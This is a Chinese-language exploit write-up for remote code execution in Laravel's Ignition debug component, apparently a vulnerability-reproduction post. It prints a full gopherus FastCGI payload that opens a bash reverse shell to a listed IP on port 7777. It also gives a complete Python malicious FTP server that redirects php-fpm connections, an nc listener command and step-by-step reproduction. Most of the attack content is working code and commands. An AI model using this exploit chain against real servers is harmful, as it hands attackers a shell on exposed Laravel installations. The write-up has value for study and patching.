LARAVEL

LARAVEL下的利用方式

先点题，看看在laravel下怎么触发这个漏洞。

直接把上述请求body中的viewFile参数的值替换为一个恶意ftp地址就可以实现rce那是随便一个ftp服务都可以吗？当然不是这个ftp服务需要满足一个条件：当客户端第一次连接时返回payload,第二次连接时将客户端连接导向其他ip:port那为什么只要访问满足上述条件的ftp服务就可以完成攻击呢？这咱们就得来看看laravel的代码逻辑了：

laravel在第6版之后，debug模式使用了ignition组件来美化堆栈信息，除此之外，ignition还附带了“一键修复bug”的功能，例如：如果我们在模板中使用了一个未知变量，会发生如下情况

只要我们轻轻点击“Make variable optional”就可以一键修复bug

那ignition是怎么实现这一功能的呢，抓个包看看：

其中，我们重点关注viewFile这个参数，代码中对它进行了如下处理：$contents = file_get_contents($parameters['viewFile']);file_put_contents($parameters['viewFile'], $contents)正是这里的一读一写操作给我们带来了利用的机会~接下来咱们以打本机的fpm服务为例来演示如何利用上述看似安全的代码实现rce

生成payload

使用gopherus生成攻击fastcgi的payload

箭头1处输入目标服务器上的某个php文件的真实路径箭头2处输入你想要在目标上执行的命令得到payload:gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%12%02%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH104%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%24SCRIPT_FILENAME/Library/WebServer/Documents/xss.php%0D%01DOCUMENT_ROOT/%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00h%04%00%3C%3Fphp%20system%28%27bash%20-c%20%22sh%20-i%20%3E%26%20/dev/tcp/172.16.230.146/7777%200%3E%261%22%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00咱们只需要_后面的内容，也就是%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%12%02%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH104%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%24SCRIPT_FILENAME/Library/WebServer/Documents/xss.php%0D%01DOCUMENT_ROOT/%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00h%04%00%3C%3Fphp%20system%28%27bash%20-c%20%22sh%20-i%20%3E%26%20/dev/tcp/172.16.230.146/7777%200%3E%261%22%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00用生成的payload替换掉下面ftp脚本中的payload

搭建恶意ftp服务

写了个脚本（代码轻喷~?）：# -*- coding: utf-8 -*-# @Time : 2021/1/13 6:56 下午# @Author : tntaxin# @File : ftp_redirect.py# @Software:import socketfrom urllib.parse import unquote# 对gopherus生成的payload进行一次urldecodepayload = unquote("%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%12%02%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH104%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%24SCRIPT_FILENAME/Library/WebServer/Documents/xss.php%0D%01DOCUMENT_ROOT/%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00h%04%00%3C%3Fphp%20system%28%27bash%20-c%20%22sh%20-i%20%3E%26%20/dev/tcp/127.0.0.1/7777%200%3E%261%22%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00")payload = payload.encode('utf-8')host = '0.0.0.0'port = 23sk = socket.socket()sk.bind((host, port))sk.listen(5)# ftp被动模式的passvie port,监听到1234sk2 = socket.socket()sk2.bind((host, 1234))sk2.listen()# 计数器，用于区分是第几次ftp连接count = 1while 1: conn, address = sk.accept() conn.send(b"200 n") print(conn.recv(20)) # USER aaarn 客户端传来用户名 if count == 1: conn.send(b"220 readyn") else: conn.send(b"200 readyn") print(conn.recv(20)) # TYPE Irn 客户端告诉服务端以什么格式传输数据，TYPE I表示二进制， TYPE A表示文本 if count == 1: conn.send(b"215 n") else: conn.send(b"200 n") print(conn.recv(20)) # SIZE /123rn 客户端询问文件/123的大小 if count == 1: conn.send(b"213 3 n") else: conn.send(b"300 n") print(conn.recv(20)) # EPSVrn' conn.send(b"200 n") print(conn.recv(20)) # PASVrn 客户端告诉服务端进入被动连接模式 if count == 1: conn.send(b"227 127,0,0,1,4,210n") # 服务端告诉客户端需要到哪个ip:port去获取数据,ip,port都是用逗号隔开，其中端口的计算规则为：4*256+210=1234 else: conn.send(b"227 127,0,0,1,35,40n") # 端口计算规则：35*256+40=9000 print(conn.recv(20)) # 第一次连接会收到命令RETR /123rn，第二次连接会收到STOR /123rn if count == 1: conn.send(b"125 n") # 告诉客户端可以开始数据链接了 # 新建一个socket给服务端返回我们的payload print("建立连接!") conn2, address2 = sk2.accept() conn2.send(payload) conn2.close() print("断开连接!") else: conn.send(b"150 n") print(conn.recv(20)) exit() # 第一次连接是下载文件，需要告诉客户端下载已经结束 if count == 1: conn.send(b"226 n") conn.close() count += 1运行上述脚本，一个恶意ftp服务就起来了这个脚本做的事情很简单，就是当客户端第一次连接的时候返回我们预设的payload当客户端第二次连接的时候将客户端的连接重定向到127.0.0.1:9000,也就是我们的php-fpm服务的端口

ps:其中ftp服务端返回的状态码是比较重要的，如果状态码不对是无法连接成功的，但是这些状态码也不是特别严格贴一篇参考文章：https://blog.csdn.net/qq981378640/article/details/51254177

使用该脚本需要自己修改对应的ip:port

本地起一个测试环境

如果你本地有php-fpm组件，可以直接运行php-fpm

我这里是用的vulhub的fpm docker镜像

本地监听一个端口用于接收reverseshell

nc -l 7777

复现

运行命令php -a进入php交互环境：然后分别执行$a = file_get_contents("ftp://aaa@172.16.230.146:23/123");以及file_put_contents("ftp://aaa@172.16.230.146:23/123", $a);

其中ftp的地址就是我前面起的恶意ftp地址

第二次file_put_contents会报错，但是不需要在意，因为我们的shell已经拿到了

其他

漏洞影响：ignition